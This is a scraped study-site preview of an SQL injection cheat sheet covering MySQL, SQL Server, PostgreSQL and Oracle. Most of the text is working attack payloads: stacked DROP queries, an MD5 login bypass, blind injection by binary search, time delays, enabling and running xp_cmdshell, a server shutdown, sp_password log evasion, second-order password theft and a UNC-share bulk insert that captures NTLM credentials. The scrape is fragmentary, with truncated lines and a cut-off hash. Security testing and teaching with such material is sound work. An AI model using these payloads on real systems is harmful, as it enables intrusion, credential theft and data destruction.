










Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
SQL Injection Cheat Sheet. Document Version 1.4. About SQL Injection Cheat Sheet. Currently only for MySQL and Microsoft SQL Server, some ORACLE and.
Typology: Study Guides, Projects, Research
1 / 18
This page cannot be seen from the preview
Don't miss anything!











SQL Injection Cheat Sheet, Document Version 1.
Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.
Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself.
M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : Possibly all other databases
Examples;
Line Comments
Comments out rest of the query. Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.
DROP sampletable;--
Line Comments Sample SQL Injection Attacks
Inline Comments
Comments out rest of the query by not closing them or you can use for bypassing blacklisting , removing spaces, obfuscating and determining database versions.
not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?
Stacked SQL Injection Attack Samples
This will run DROP members SQL sentence after normal SQL Query.
Get response based on a if statement. This is one of the key points of Blind SQL Injection , also can be very useful to test simple stuff blindly and accurately.
MySQL If Statement
SQL Server If Statement
If Statement SQL Injection Attack Samples
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S) This will throw an divide by zero error if current logged user is not "sa" or "dbo".
Very useful for bypassing, magic_quotes() and similar filters , or even WAFs.
SELECT CHAR(0x66) (S) SELECT 0x5045 ( this is not an integer it will be a string from Hex ) (M) SELECT 0x50 + 0x45 ( this is integer now! ) (M)
String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
String Concatenation
SELECT login + '-' + password FROM members
*About MySQL "||"; If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as logical operator it’ll return 0. Better way to do it is using CONCAT() function in MySQL.
These are some direct ways to using strings but it’s always possible to use CHAR()(MS) and CONCAT()(M) to generate string without quotes.
In MySQL easy way to generate hex representations of strings use this; SELECT CONCAT('0x',HEX('c:\boot.ini'))
Hex based SQL Injection Samples
Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.
SELECT ASCII('a')
SELECT CHAR(64)
If application is first getting the record by username and then compare returned MD with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
Bypassing MD5 Hash Check Example (MSP)
Username : admin Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
Finding Column Names with HAVING BY - Error Based (S)
In the same order,
Finding how many columns in SELECT query by ORDER BY (MSO+)
Finding column number by ORDER BY can speed up the UNION SQL Injection process.
Hints,
Finding Column Type
If you are not getting error it means column is numeric.
Microsoft OLE DB Provider for SQL Server error '80040e07' Explicit conversion from data type int to image is not allowed.
You’ll get convert() errors before union target errors! So start with convert() then union
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
@@version (MS) Version of database and more details for SQL Server. It's a constant. You can just select
More Stored Procedures for SQL Server (S)
MSSQL Bulk Notes
SELECT * FROM master..sysprocesses /WHERE spid=@@SPID/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/
HOST_NAME() IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL) OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en- us/library/ms190312.aspx
You can not use sub selects in SQL Server Insert queries.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If injection is in second limit you can comment it out or use in your union injection
Shutdown SQL Server (S)
When you really pissed off, ';shutdown --
By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.
EXEC sp_configure 'show advanced options', RECONFIGURE
EXEC sp_configure 'xp_cmdshell', RECONFIGURE
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is P. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.
First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.
WAIT FOR DELAY 'time' (S)
This is just like sleep, wait for spesified time. CPU safe way to make database wait.
WAITFOR DELAY '0:0:10'--
Also you can use fractions like this,
WAITFOR DELAY '0:0:0.51'
Real World Samples
BENCHMARK() (M)
Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)
Real World Samples
pg_sleep(seconds) (P)
Sleep for supplied seconds.
SQL Server -sp_password log bypass (S)
SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs ( of course still will be in web server logs , try to use POST if it's possible )
o select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
Potentially Useful MySQL Functions
Basically you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.
Name : ' + (SELECT TOP 1 password FROM users ) + ' Email : [email protected]
If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.
This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel.
Bulk insert from a UNC Share (S) bulk insert foo from '\YOURIPADDRESS\C$\x.txt'
Check out Bulk Insert Reference to understand how can you use bulk insert.
Since these notes collected from several different sources within several years and personal experiences, may I missed some references. If you believe I missed yours or someone else then drop me an email (ferruh-at-mavituna.com), I'll update it as soon as possible.
o Advanced SQL Injection In SQL Applications, Chris Anley o More Advanced SQL Injection In SQL Applications, Chris Anley o Blindfolded SQL Injection, Ofer Maor – Amichai Shulman o Hackproofing MySQL, Chris Anley o Database Hacker's Handbook, David Litchfield, Chris Anley, John Heasman, Bill Grindlay o Upstairs Team!